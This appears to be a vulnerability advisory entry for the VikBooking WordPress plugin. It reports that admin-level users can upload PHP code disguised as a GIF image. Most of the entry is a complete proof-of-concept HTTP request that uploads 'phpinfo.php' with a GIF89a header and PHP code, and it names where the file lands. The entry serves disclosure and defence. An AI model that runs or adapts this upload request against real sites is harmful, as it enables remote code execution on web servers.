The plugin does not properly validate images, allowing high privilege users such as administrators to upload PHP files disguised as images and containing malicious PHP code
Edit/add a Characteristics (/wp-admin/admin.php?option=com_vikbooking&task=carat) and upload a fake GIF with PHP code in it as a Characteristic Image: POST /wp-admin/admin.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------119541905442224294322517652959 Content-Length: 1469 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="caratname" WiFi -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="caraticon"; filename="phpinfo.php" Content-Type: image/gif GIF89a; <?php phpinfo() ?> -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="resizeto" 250 -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="carattextimg" <i class="fas fa-wifi vbo-icn-carat vbo-pref-color-text"></i> -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="ordering" 1 -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="task" updatecarat -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="whereup" 1 -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="option" com_vikbooking -----------------------------119541905442224294322517652959 Content-Disposition: form-data; name="vikwp_nonce" 2817d7732a -----------------------------119541905442224294322517652959-- PHP file will be at https://example.com/m/wp-content/plugins/vikbooking/site/resources/uploads/phpinfo.php
UPLOAD
Gabriel3476
Gabriel3476
Yes
2022-04-21 (about 2 months ago)
2022-04-21 (about 2 months ago)
2022-04-22 (about 2 months ago)